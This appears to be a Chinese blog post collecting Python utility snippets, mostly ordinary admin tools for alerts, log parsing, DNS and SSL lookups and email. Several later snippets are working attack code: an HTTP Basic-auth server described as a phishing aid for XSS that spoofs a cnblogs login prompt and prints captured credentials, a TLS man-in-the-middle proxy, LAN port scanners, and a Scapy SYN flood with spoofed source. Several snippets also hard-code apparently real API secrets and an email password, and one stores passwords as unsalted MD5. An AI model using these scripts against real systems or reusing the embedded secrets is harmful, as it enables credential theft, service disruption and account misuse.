Python 其他通用代码总结

2022-12-28 13:17:45 浏览数 (2)

封装钉钉通知接口: 接口的调用需要传入需要通知特定人的手机号,调用后会在顶顶群内通知.

代码语言:javascript复制
import requests
import urllib.parse
import time,hmac,hashlib,base64,json

class DingToken():
    def __init__(self,atAll,atMobiles):
        self.atAll = atAll
        self.atMobiles = atMobiles

    def send_message(self,message):
        timestamp = str(round(time.time() * 1000))
        secret = 'SEC1018485caf7339e38530b4923ef3cfa164d03af6a79105af0013246048479bf1'
        secret_enc = secret.encode('utf-8')
        string_to_sign = '{}n{}'.format(timestamp, secret)
        string_to_sign_enc = string_to_sign.encode('utf-8')
        hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest()
        sign = urllib.parse.quote(base64.b64encode(hmac_code))

        headers={'Content-Type': 'application/json'}
        webhook = 'https://oapi.dingtalk.com/robot/send?access_token=0fe10f5f4e8dd74e6b90afb2f74b2b8a8aaa3bf246dccfead9d7395a56fae586&timestamp='   timestamp   "&sign="   sign
        data = {
            "msgtype": "text",
            "text": {"content": message },
            "at": {
                "atMobiles": [ self.atMobiles ],
                "isAtAll": self.atAll
                }
            }
        requests.post(webhook, data=json.dumps(data), headers=headers)

    # 发送警告信息
    def send_warning(self,platform,address,send_date,message):
        self.send_message(
                    "------------------------------------------------------- n"
                    "t {0} n"
                    "------------------------------------------------------- n"
                    "系统地址: t {1} n"
                    "告警日期: t {2} n"
                    "------------------------------------------------------- n"
                    "{3}"
                    "-------------------------------------------------------".
                        format(platform,address,send_date,message) )

if __name__ == "__main__":
    # 参数1是否为全员,参数二需要at的手机号
    ding = DingToken(False,"15646596977")
    ding.send_warning("总部客服(呼叫中心)","192.168.1.1","2021:01:01","hello lyshark n")

计算范围时间戳: 编程实现在日志文件中提取出指定时间之内对应系统数据,用于通过时间戳定位时间区间.

代码语言:javascript复制
import sys,os,time
import logging,datetime

def Write_Dictionaries(LogName,Dict):
    logging.basicConfig(level=logging.DEBUG,
                    format = "%(created)d --> %(levelname)s --> %(asctime)s --> %(message)s",
                    datefmt = "%Y-%m-%d %H:%M:%S",
                    filename = LogName,
                    filemode = "a ")
    logging.info(str(Dict))

def Read_Dictionaries(LogName,Start_Time,End_Time):
    find_time_stamp = []

    with open(LogName,"r",encoding="utf-8") as fp:
        start = int(time.mktime(time.strptime(Start_Time,"%Y-%m-%d %H:%M:%S")))
        end = int(time.mktime(time.strptime(End_Time,"%Y-%m-%d %H:%M:%S")))
        for item in fp:
            data = item.split(" --> ")
            if int(data[0]) >= start and int(data[0]) <= end:
                find_dict = eval(data[3].replace("n",""))
                find_time_stamp.append(find_dict)
    return find_time_stamp

if __name__ == "__main__":
    for item in range(1,0):
        dic = {"Address": "192.168.1.1", "CPU": str(item), "MEM": str(item*10), "IO": str(item/2)}
        Write_Dictionaries("addr.log",dic)
        time.sleep(1)
        print("写入内容: {}".format(dic))

find_dict = Read_Dictionaries("addr.log","2020-03-19 16:10:43","2020-03-19 16:10:54")
for item in find_dict:
    print("IP地址: {} CPU负载: {}".format(item.get("Address"),item.get("CPU")))

两个文本差异比对: 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html表格方便展示.

代码语言:javascript复制
import difflib
import argparse
import sys

# 创建打开文件函数,并按换行符分割内容
def readfile(filename):
    try:
        with open(filename, 'r') as fileHandle:
            text = fileHandle.read().splitlines()
        return text
    except IOError as e:
        print("Read file Error:", e)
        sys.exit()

# 比较两个文件并输出到html文件中
def diff_file(filename1, filename2):
    text1_lines = readfile(filename1)
    text2_lines = readfile(filename2)
    d = difflib.HtmlDiff()
    # context=True时只显示差异的上下文,默认显示5行,由numlines参数控制,context=False显示全文,差异部分颜色高亮,默认为显示全文
    result = d.make_file(text1_lines, text2_lines, filename1, filename2, context=True)
    # 内容保存到result.html文件中
    with open('result.html', 'w') as resultfile:
        resultfile.write(result)
    # print(result)

if __name__ == '__main__':
    # 定义必须传入两个参数,使用格式-f1 filename1 -f2 filename
    parser = argparse.ArgumentParser(description="传入两个文件参数")
    parser.add_argument('-f1', action='store', dest='filename1', required=True)
    parser.add_argument('-f2', action='store', dest='filename2', required=True)
    given_args = parser.parse_args()
    filename1 = given_args.filename1
    filename2 = given_args.filename2
    diff_file(filename1, filename2)

计算指定网段IP数量: 例如输入网段192.168.1.1/100则计算出这个网段范围内的所有主机数.

代码语言:javascript复制
import os

def CalculationIP(Addr_Count):
    ret = []
    try:
        IP_Start = str(Addr_Count.split("/")[0]).split(".")
        IP_Heads = str(IP_Start[0]   "."   IP_Start[1]   "."   IP_Start[2]  ".")
        IP_Start_Range = int(Addr_Count.split(".")[3].split("/")[0])
        IP_End_Range = int(Addr_Count.split("/")[1])
        for item in range(IP_Start_Range,IP_End_Range 1):
            ret.append(IP_Heads str(item))
        return ret
    except Exception:
        return 0

if __name__ == "__main__":
    ret = CalculationIP("192.168.1.1/100")

    for item in range(len(ret)):
        print("地址范围内的所有IP: {}".format(ret[item]))

使用PSutil库提取数据: 通过使用第三方工具库,提取出系统中的网络连接请求与进程线程的详细数据.

代码语言:javascript复制
import psutil

# 获取到网卡的出口入口流量信息
def GetNetwork():
    network = psutil.net_io_counters(pernic=True,nowrap=True)
    for each in network.keys():
        print("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s"
        %(each,network[each].bytes_sent,network[each].bytes_recv,
        network[each].packets_sent,network[each].packets_recv))
# 获取到当前电脑中的网络连接状态: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
    network = psutil.net_connections(kind="tcp")
    AllowData = []
    for each in network:
        src_addr,src_port = each.laddr.ip,each.laddr.port
        src_stats = each.status
        src_pid = each.pid
        if src_stats in ["ESTABLISHED","LISTEN"]:
            process = psutil.Process(src_pid)
            print("[ ] IP地址: s:%-5s  PID: %5s  名称: %-10s"
            %(src_addr,src_port,src_pid,process.name()))
            AllowData.append([process.name(),src_port])
    return AllowData
# 遍历整个系统中所有进程PID并取出关键数据
def GetProcessID():
    for each in psutil.pids():
        p = psutil.Process(int(each))
        print("-" * 100)
        print("进程: %s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s"
        %(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
        print("-" * 100)
        print("CPU时间信息: {}".format(p.cpu_times()))
        print("MEM内存信息: {}".format(p.memory_info()))
        print("进程IO读写参数: {}".format(p.io_counters()))
        print("进程对外SOCKET: {}".format(p.connections()))
        print("r"*100)

简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123

代码语言:javascript复制
import os,time
import hashlib

db = [
    {"user":"admin","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
    {"user":"guest","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"},
    {"user":"lyshark","pass":"4297f44b13955235245b2497399d7a93","Flag":"0"}
]

def CheckUser(username,password):
    hash = hashlib.md5()
    for i in range(0,len(db)):
        if db[i].get("user") == username:
            if db[i].get("Flag") < "5":
                hash.update(bytes(password,encoding="utf-8"))
                if db[i].get("pass") == str(hash.hexdigest()):
                    db[i]['Flag'] = 0
                    return 1
                else:
                    db[i]['Flag'] = str(int(db[i]['Flag'])   1)
                    return 0
            else:
                print("用户 {} 被永久限制登录".format(db[i].get("user")))
                return 0
    return 0

while(True):
    username = input("输入用户名: ")
    password = input("输入密码: ")
    ret= CheckUser(username,password)
    print("登录状态:",ret)

SQLite提取数据并绘图 通过使用matplotlib这个库函数,并提取出指定时间的数据记录,然后直接绘制曲线图.

代码语言:javascript复制
import os,time,datetime
import sqlite3
import numpy as np
from matplotlib import pyplot as plt

def TimeIndex(db,table,start,ends):
    start_time = int(time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S")))
    end_time = int(time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S")))
    conn = sqlite3.connect(db)
    cursor = conn.cursor()
    select = "select * from {} where time >= {} and time <= {}".format(table,start_time,end_time)
    return cursor.execute(select).fetchall()

def Display():
    temp = TimeIndex("data.db","lyshark","2019-12-12 14:28:00","2019-12-12 14:29:00")
    list = []
    for i in range(0,len(temp)):
        list.append(temp[i][1])
    plt.title("CPU Count")
    plt.plot(list, list)
    plt.show()
    
if __name__ == "__main__":
    Display()

将图片转为字符图片: 通过pillow图片处理库,对图片进行扫描,然后用特殊字符替换图片的每一个位,生成的字符图片.

代码语言:javascript复制
from PIL import Image
import argparse

# 将256灰度平均映射到70个字符上
def get_char(r,g,b,alpha = 256):
    ascii_char = list("~!@#$%^&*()_  ")
    if alpha == 0:
        return " "
    length = len(ascii_char)
    gray = int(0.2126 * r   0.7152 * g   0.0722 * b)
    unit = (256.0   1)/length
    return ascii_char[int(gray/unit)]

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file",dest="file",help="指定一个图片文件")
    parser.add_argument("--width",dest="width",type=int,default=50,help="指定图片宽度")
    parser.add_argument("--height",dest="height",type=int,default=25,help="指定图片高度")
    args = parser.parse_args()
    # 使用方式: pip install pillow | main.py --file=xxx.jpg
    if args.file != None:
        img = Image.open(args.file)
        img = img.resize((args.width,args.height), Image.NEAREST)
        txt = ""
        for row in range(args.height):
            for cow in range(args.width):
                txt  = get_char(*img.getpixel((cow,row)))
            txt  = "n"
        print(txt)
    else:
        parser.print_help()

针对视频转为字符串: 通过opencv库实现对指定MP4文件替换为字符串格式,并播放出来.

代码语言:javascript复制
# pip install opencv-python
import cv2,os,argparse

def PlayCharMP4(file_name,heigth,width):
    ascii_char = list("~!@#$%^&*()_ /-,.;:'{}[]=qwertyuiokjhgfd")
    char_len = len(ascii_char)
    vc = cv2.VideoCapture(file_name)       # 加载一个视频
    if vc.isOpened():                      # 判断是否正常打开
        rval,frame = vc.read()
    else:
        rval = False
    frame_count,outputList = 0,[]
    while rval:                                         # 循环读取视频帧  
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)  # 转化成灰度图
        gray = cv2.resize(gray,(width,heigth))          # 重置图片大小
        text = ""
        for pixel_line in gray:                         # 循环处理行
            for pixel in pixel_line:                    # 循环处理列
                text  = ascii_char[int(pixel / 256 * char_len )]
            text  = "n"                                
        outputList.append(text)
        frame_count = frame_count   1                           
        if frame_count % 100 == 0:
            print("处理视频: "   str(frame_count)   " 帧")
        rval, frame = vc.read()
    for frame in outputList:            # 读取处理后的每一帧         
        os.system("cls")                # 清屏
        print(frame)                    # 打印每一帧

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--file",dest="file",help="指定一个MP4文件")
    args = parser.parse_args()
    if args.file != None:
        PlayCharMP4(args.file,30,80)
    else:
        parser.print_help()

调用百度翻译API: 调用百度翻译API完成翻译任务.

代码语言:javascript复制
import requests
import string
import time
import hashlib
import json
 
api_url = "http://api.fanyi.baidu.com/api/trans/vip/translate"
my_appid = "20220303001108300"
cyber = "pZmk93BeezwigjmjkOYS"
lower_case = list(string.ascii_lowercase)
 
def requests_for_dst(word):
    #init salt and final_sign
    salt = str(time.time())[:10]
    final_sign = str(my_appid) word salt cyber
    final_sign = hashlib.md5(final_sign.encode("utf-8")).hexdigest()
    #区别en,zh构造请求参数
    if list(word)[0] in lower_case:
        paramas = {
            'q':word,
            'from':'en',
            'to':'zh',
            'appid':'%s'%my_appid,
            'salt':'%s'%salt,
            'sign':'%s'%final_sign
            }
        my_url = api_url '?appid=' str(my_appid) '&q=' word '&from=' 'en' '&to=' 'zh' '&salt=' salt '&sign=' final_sign
    else:
        paramas = {
            'q':word,
            'from':'zh',
            'to':'en',
            'appid':'%s'%my_appid,
            'salt':'%s'%salt,
            'sign':'%s'%final_sign
            }
        my_url = api_url '?appid=' str(my_appid) '&q=' word '&from=' 'zh' '&to=' 'en' '&salt=' salt '&sign=' final_sign
    response = requests.get(api_url,params = paramas).content
    content = str(response,encoding = "utf-8")
    json_reads = json.loads(content)
    print(json_reads['trans_result'][0]['dst'])
 
while True:
    word = input("输入文本 -> ")
    requests_for_dst(word)

统计网站访问日志: 实现统计网站访问日志,并得到字典类型返回值.

代码语言:javascript复制
import os,json

def Count_Flag_And_Flow(file):
    list = []
    flag = {}
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        it = line.split()[8]
        list.append(it)
    list_num = set(list)
    for item in list_num:
        num = list.count(item)
        flag[item] = num
    return flag

def Count_Flag_And_Type(file):
    list = []
    flag = {}
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        list.append( line.split()[12].replace("(","").replace(")",""))

    list_num = set(list)
    for item in list_num:
        num = list.count(item)
        flag[item] = num
    return flag

def Count_Time_And_Flow(file):
    times = {}  # key 保存当前时间信息
    flow = {}  # value 当前时间流量总和
    Count= 0   # 针对IP地址的计数器
    with open(file) as f:
        contexts = f.readlines()
    for line in contexts:
        if line.split()[9] != "-" and line.split()[9] != '"-"':
            size = line.split()[9]
        temp = line.split()[3]
        ip_attr = temp.split(":")[1]   ":"   temp.split(":")[2]
        Count = int(size)   Count
        if ip_attr in times.keys():
            flow[ip_attr] = flow[ip_attr]   int(size)
        else:
            times[ip_attr] = 1
            flow[ip_attr] = int(size)
    return flow

if __name__ =="__main__":
    Address = Count_Flag_And_Flow("d://access.log")
    print(Address)

    Types = Count_Flag_And_Type("d://access.log")
    print(Types)

    OutFlow = Count_Time_And_Flow("d://access.log")
    print(OutFlow)

SMTPlib发送邮件: 简单封装一个SMTP邮件发送功能,传值即可直接使用.

代码语言:javascript复制
import smtplib
from email.mime.text import MIMEText

# 登录邮箱服务器
mail_host = 'smtp.qq.com'
mail_user = '1181506874@qq.com'
mail_pass = 'wrpmzkalqqvhhijc'

# 调用发信函数
def SendMail(sender_user,recivers_user,title,subject,is_ssl = False):
    # 邮件发送方邮箱地址
    sender = sender_user
    receivers = [recivers_user]

    # 设置email信息
    # message = MIMEText(subject,'plain','utf-8')
    message = MIMEText(subject, 'html', 'utf-8')
    message['Subject'] = title
    message['From'] = sender
    message['To'] = receivers[0]

    # 登录并发送邮件
    try:
        if is_ssl != True:
            smtpObj = smtplib.SMTP()
            smtpObj.connect(mail_host,25)
            smtpObj.login(mail_user,mail_pass)
        else:
            smtpObj = smtplib.SMTP()
            smtpObj.connect(mail_host, 25)
            smtpObj = smtplib.SMTP_SSL(mail_host)
            smtpObj.login(mail_user, mail_pass)
        # 发送
        smtpObj.sendmail(sender,receivers,message.as_string())
        smtpObj.quit()
        return True
    except smtplib.SMTPException as e:
        return False

if __name__ == "__main__":
    # sender_user   发送方邮箱
    # recivers_user 接收方邮箱
    # title         发送标题
    # subject       正文
    # is_ssl        是否开启SSL
    ref = SendMail("1181506874@qq.com","lysharks@163.com","Flask 邮箱验证码",
                   "<p>您本次的验证码是: 1Ae3 有效期10分钟. </p><br><br> "
                   "更多内容请访问: <a href='https://www.baidu.com'>www.baidu.com</a>",False)
    print(ref)

构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.

代码语言:javascript复制
import socketserver
import http.server

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        if str(self.headers).find('UserLogin=1') > 0:
            self.send_response(302)
            self.send_header('Location', 'https://account.cnblogs.com/signin')
            self.end_headers()
        else:
            if str(self.headers).find('Authorization: Basic ') > 0:
                self.send_response(302)
                self.send_header('Set-Cookie', 'UserLogin=1')
                self.send_header('Location', 'https://account.cnblogs.com/signin')
                print("------------------------------------------------------------")
                print(str(self.headers))
            else:
                self.send_response(401)
                self.send_header('Content-type', 'text/html; charset=UTF-8')
                self.send_header('WWW-Authenticate',
                                 'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
                self.end_headers()

httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()

获取DNS证书时间: 通过使用SSL类我们可以直接对一个网站解析出其SSL证书信息.

代码语言:javascript复制
import ssl,sys,socket

def GetSSL_DNS(hostname):
    host=str(hostname).rstrip().lstrip()
    try:
        ctx = ssl.create_default_context()
        sock = ctx.wrap_socket(socket.socket(), server_hostname=hostname)
        sock.settimeout(5)
        sock.connect((host, 443))
        crt = sock.getpeercert()
        print("组织单位: {}".format(crt["subject"][2][0][1]))
        print("通用名: {}".format(crt["issuer"][2][0][1]))
        print("序列号: {}".format(crt["serialNumber"]))
        print("起始时间: {} ".format(crt["notBefore"]))
        print("终止时间: {} ".format(crt["notAfter"]))
        print('-------- 针对域名 {} DNS的列表 --------'.format(hostname))
        for item in crt['subjectAltName']:
            print("DNS: {}".format(item[1]))
    except Exception:
        pass

if __name__ == "__main__":
    try:
        if sys.argv[1]:
            GetSSL_DNS(sys.argv[1])
    except Exception:
        print("[-] 请输入一个域名: baidu.com")
        pass

DNS模块查域名解析: 使用 DNS-Python 这个模块来查询特定的一个或一组域名的所有解析记录.

代码语言:javascript复制
# pip install dnspython
import os
import dns.resolver
from collections import defaultdict

domain = "baidu.com"

A = dns.resolver.query(domain,"A")
for x in A.response.answer:
    for y in x.items:
        print("查询到A记录:{} ".format(y))
print("*"*50)

MX = dns.resolver.query(domain,"MX")
for x in MX:
    print("MX交换数值 {}  MX记录:{} ".format(x.preference,x.exchange))
print("*"*50)

NS = dns.resolver.query(domain,"NS")
for x in NS.response.answer:
    for y in x.items:
        print("NS名称服务:{} ".format(y.to_text()))
# -------------------------------------------------------------------------
hosts = ["baidu.com","weibo.com","sina.com"]
IP_List = defaultdict(list)

def query(hosts):
    for host in hosts:
        ip = dns.resolver.query(host,"A")
        for i in ip:
            IP_List[host].append(i)
    return IP_List

for i in query(hosts):
    print(i,IP_List[i])

解析HTTP服务状态: 通过调用pycurl模块对指定的Web服务器进行健康状态监测.

代码语言:javascript复制
import pycurl,certifi
from io import BytesIO

headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']
def header_function(header_line):
    header_line = header_line.decode("utf-8")
    #print(header_line.split(":"))

class ex_response(object):
    def __init__(self,url):
        self.buffer = BytesIO()                      # 创建缓存对象
        self.c = pycurl.Curl()                       # 创建curl实例
        self.c.setopt(pycurl.URL,url)                # 设置资源路径
        self.c.setopt(pycurl.CAINFO,certifi.where()) # 设置指定证书验证包(http页面需要去掉本行)
        self.c.setopt(pycurl.WRITEDATA, self.buffer)
        self.c.setopt(pycurl.WRITEHEADER,self.buffer)
        self.c.setopt(self.c.HTTPHEADER,headers)              # 设置HTTP头
        self.c.setopt(pycurl.HEADERFUNCTION, header_function) # 调用外部函数
        
        try:
            self.c.perform()
        except Exception:
            self.buffer.close()
            self.c.close()

    def getinfo(self):
        h1 = self.c.getinfo(pycurl.HTTP_CODE)          # 状态码
        h2 = self.c.getinfo(pycurl.TOTAL_TIME)         # 传输结束总消耗时间
        h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME)    # DNS解析时间
        h4 = self.c.getinfo(pycurl.CONNECT_TIME)       # 建立连接时间
        h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME)   # 建立连接到准备传输消耗时间
        h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) # 从建立连接到传输开始消耗时间
        h7 = self.c.getinfo(pycurl.REDIRECT_TIME)      # 重定向消耗时间
        h8 = self.c.getinfo(pycurl.SIZE_UPLOAD)        # 上传数据包大小
        h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD)      # 下载数据包大小
        h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD)    # 平均下载速度
        h11 = self.c.getinfo(pycurl.SPEED_UPLOAD)      # 平均上传速度
        h12 = self.c.getinfo(pycurl.HEADER_SIZE)       # http头文件大小
        info ='''
            http状态码:%s
            传输结束总时间:%.2f ms
            DNS解析时间:%.2f ms
            建立连接时间:%.2f ms
            准备传输时间:%.2f ms
            传输开始时间:%.2f ms
            重定向时间:%.2f ms
            上传数据包大小:%d bytes/s
            下载数据包大小:%d bytes/s
            平均下载速度:%d bytes/s
            平均上传速度:%d bytes/s
            http头文件大小:%d byte
        ''' %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
        print(info)
        self.buffer.close()
        self.c.close()

if __name__ == "__main__":
    curl_respon = ex_response("https://www.baidu.com")
    curl_respon.getinfo()

模拟Proxy实现MITM: 假设已经获取server端和客户端的证书,此脚本可以伪造客户端和服务端,实现MITM的场景。

代码语言:javascript复制
import socket
import ssl
import threading
import queue
import time

fromCliQueue = queue.Queue()
fromSrvQueue = queue.Queue()

sFlag = False
## Client -- proxyServer -- proxyClient -- Server

class proxyClient(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.sock = None
 
        self.ssl_context = ssl.create_default_context(cafile='RootCA.pem')
        self.ssl_context.load_cert_chain("Client.pem", "Client.key")
        self.ssl_context.protocol = ssl.PROTOCOL_TLSv1_2
        self.ssl_context.check_hostname = False
 
    def run(self):
        global fromCliQueue
        global fromSrvQueue
        while True:
            #if mesg queue from client is not empty, send it to server and recv response
            if not fromCliQueue.empty():
                if self.sock is None:
                    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
                    self.sock.connect(('127.0.0.1', 9999))
                else:
                    sdata = fromCliQueue.get()
                    print("[proxyClient]send to server: {}".format(sdata))
 
                    self.sock.send(sdata)
 
                    rdata = self.sock.recv(4096)
                    #解决recv总是收到空字符
                    if rdata != b'':
                        print("[proxyClient]recv from server: {}".format(rdata))
                        fromSrvQueue.put(rdata)
                        self.sslDetected(rdata)
 
    def sslDetected(self, data):
        if b'x01x00x00x00' in data:
            self.sock = self.ssl_context.wrap_socket(self.sock)
            print("[proxyClient]ssl neogotiation")
            return True
        else:
            return False

class proxyServer(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind(('127.0.0.1',8888))
        self.sock.listen(1)
 
        self.ssl_context = ssl.SSLContext()
        # self.ssl_context.verify_mode = ssl.CERT_REQUIRED
        self.ssl_context.load_verify_locations(cafile='RootCA.pem')
        # self.ssl_context.check_hostname = False
 
        # test this protocol with client's PROTOCOL_TLSv1_2
        self.ssl_context.protocol = ssl.PROTOCOL_TLS_SERVER
        self.ssl_context.load_cert_chain("Server.pem", "Server.key")

    def run(self):
        global fromSrvQueue
        global fromCliQueue
        self.proxySocket, addr = self.sock.accept()
        while self.proxySocket:
            rdata = self.proxySocket.recv(4096)
            if rdata != b'':
                print("[proxyServer]recv from client: {}".format(rdata))
                fromCliQueue.put(rdata)
            while True:
                if fromSrvQueue.empty():
                    time.sleep(1)
                    continue
                else:
                    sdata = fromSrvQueue.get()
                    print("[proxyServer]send to client: {}".format(sdata))
                    self.proxySocket.send(sdata)
                    self.sslDetected(sdata)
                    break;
 
    def sslDetected(self, data):
        if b'x01x00x00x00' in data:
            self.proxySocket = self.ssl_context.wrap_socket(self.proxySocket, server_side=True)
            print("[proxyClient]ssl neogotiation")
            return True
        else:
            return False

if __name__ == "__main__":
    proxyCli = proxyClient()
    proxyCli.daemon = True
    proxyCli.start()
 
    proxySrv = proxyServer()
    proxySrv.daemon = True
    proxySrv.start()
 
    proxySrv.join()

计算ICMP校验和: 校验和的目的是计算数据包完整性,防止数据包被非法损坏, 在ICMP数据包发送时,会自动计算校验和并将其设置到ICMP报文中,在目标设备收到后再次计算校验和,并与数据包中的校验和作比较,从而判断该ICMP包是否正常.

代码语言:javascript复制
import os,sys

# 计算并返回校验和字段
def icmp_chesksum(message):
    # 获取传入的数据包长度
    length = len(message)

    # 将校验和计算总数全部增加到 sum_number_count 中.
    sum_number_count = 0

    # 判断数据包是否为偶数
    mold_taking = length % 2

    # 循环计算,每次取出2个字节,相加.
    for i in range(0, length - mold_taking, 2):
        # 将数据以每两个字节(十六进制)通过ord转十进制,第一字节在低位,第二个字节在高位
        sum_number_count  = ord(message[i])   (ord(message[i   1]) << 8)

    # 传入的数据长度是奇数则执行,且把这个字节(8位)加到前面的结果
    if mold_taking:
        sum_number_count  = ord(message[-1])

    # 将数据包中高于16位与低16位相加
    sum_number_count = (sum_number_count >> 16)   (sum_number_count & 0xffff)

    # 如果还有高于16位,将继续与低16位相加
    sum_number_count  = (sum_number_count >> 16)

    # 对sum取反(返回十进制)
    answer = ~sum_number_count & 0xffff

    # 主机字节序转网络字节序
    answer = answer >> 8 | (answer << 8 & 0xff00)
    return answer

def get_check_sum():
    type = "x08"                             # 8代表ICMP回显类型
    code = "x00"                             # 此处必须为0
    checksum = "x00x00"                     # 设置校验和字段为空
    id = "x00x01"                           # 设置ICMP序号,默认是1
    sequece = "x00x01"                      # 执行序号
    body = "abcdefghijklmnopqrstuvwabcdefghi" # 发送正文内容

    # 封装为一个ICMP报文格式
    icmp_message = type   code   checksum   id   sequece   body

    # 计算并返回校验和
    ref = icmp_chesksum(icmp_message)
    return ref

if __name__ == "__main__":
    checksum = get_check_sum()
    print("十进制校验和: {:d}".format(checksum))

发送ICMP原始数据包: 接着就是来实现构建并发送socket.SOCK_RAW原始数据包,发送的实现细节与上方解包原理完全一致.

代码语言:javascript复制
import socket,time

def raw_socket(dst_addr,imcp_packet):
    # 构建原始数据包,发送类型为ICMP协议
    rawsocket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname("icmp"))

    # 记录当前请求时间
    send_request_time = time.time()

    # 一次性发送出去,并等待返回的时间和套接字句柄
    rawsocket.sendto(imcp_packet,(dst_addr,80))
    return send_request_time,rawsocket,dst_addr

if __name__ == "__main__":
    send_request_time,rawsocket,dst_addr = raw_socket("8.141.58.64",bytes("hello lyshark",encoding="utf-8"))
    print("发送时间戳: {} --> 发送IP: {} --> 数据包句柄: {}".format(send_request_time,dst_addr,rawsocket))

寻找内网路由地址: 除了设置socket.SOCK_RAW原始数据包模式外,Python还可以设置socket.SOCK_STREAM数据流模式,使用该模式还可实现扫描内网分布主机情况.

例如: 通过本地网段计算出C段IP地址,然后调用Check方法扫描目标网段内是否存在80端口开放的主机.

代码语言:javascript复制
import socket,threading

routers = []
lock = threading.Lock()

def search_router():
    all_thread = []
    local_ip = socket.gethostbyname_ex(socket.gethostname())[2]
    print("本地接口: "   str(local_ip))
    for ip in local_ip:
        for i in range(1, 255):
            array = ip.split('.')
            array[3] = str(i)
            addr = '.'.join(array)
            thread = threading.Thread(target=check, args=(addr,))
            thread.start()
            all_thread.append(thread)
    for item in all_thread:
        item.join()

def check(addr):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(1)
    result = sock.connect_ex((addr, 80))
    sock.close()
    if result == 0:
        lock.acquire()
        print("该网段路由器可能是: {}".format(addr))
        routers.append((addr, 80))
        lock.release()

if __name__ == "__main__":
    search_router()

Nmap 搜索网段主机并绘图: 首先电脑中必须安装Nmap,然后使用如下脚本统计内网主机数,并最后绘制饼图展示.

代码语言:javascript复制
# pip install numpy matplotlib -i https://pypi.tuna.tsinghua.edu.cn/simple
import os,nmap,time
import numpy as np
from matplotlib.pylab import *

def ScanPort(addr):
    port =[]
    flag = {}
    dic = {"WebServer":0,"MySQL":0,"SSH":0,"MSSQL":0,"FTP":0,"Danger":0}
    Nmap = nmap.PortScanner()
    try:
        ret = Nmap.scan(hosts=addr,arguments="-PS")
        for item in Nmap.all_hosts():
            try:
                temp = list(ret["scan"][item]["tcp"].keys())
                print("[*] IP地址: s 开放端口: %s"%(item,temp))
                port.extend(temp)
            except Exception:
                pass
    except Exception:
        print("[-] Nmap 端口扫描异常,程序被迫终止.")
        exit(0)
    
    list_num = set(port)
    for item in list_num:
        num = int(port.count(item))
        flag[item] = num
    dic["WebServer"] = flag.get(80)
    dic["MySQL"] = flag.get(3306)
    dic["SSH"] = flag.get(22)
    dic["MSSQL"] = flag.get(1433)
    dic["FTP"] = flag.get(21)
    dic["Danger"] = flag.get(135)   flag.get(139)   flag.get(445)
    print("[ ] 服务统计: {}".format(dic))
    mpl.rcParams["font.sans-serif"] = ["KaiTi"]
    label = list(dic.keys())
    fracs = list(dic.values())
    plt.axes(aspect=1)
    plt.pie(x=fracs,labels=label,autopct="
%%")
    plt.savefig("scan.png")

if __name__ == "__main__":
    ScanPort("192.168.1.0/24")

使用Scapy制造SYN洪泛攻击: 使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。

代码语言:javascript复制
#coding=utf-8
from scapy.all import *

def synFlood(src, tgt):
    # TCP源端口不断自增一,而目标端口513不变
    for sport in range(1024, 65535):
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=sport, dport=513)
        pkt = IPlayer / TCPlayer
        send(pkt)

src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)

0 人点赞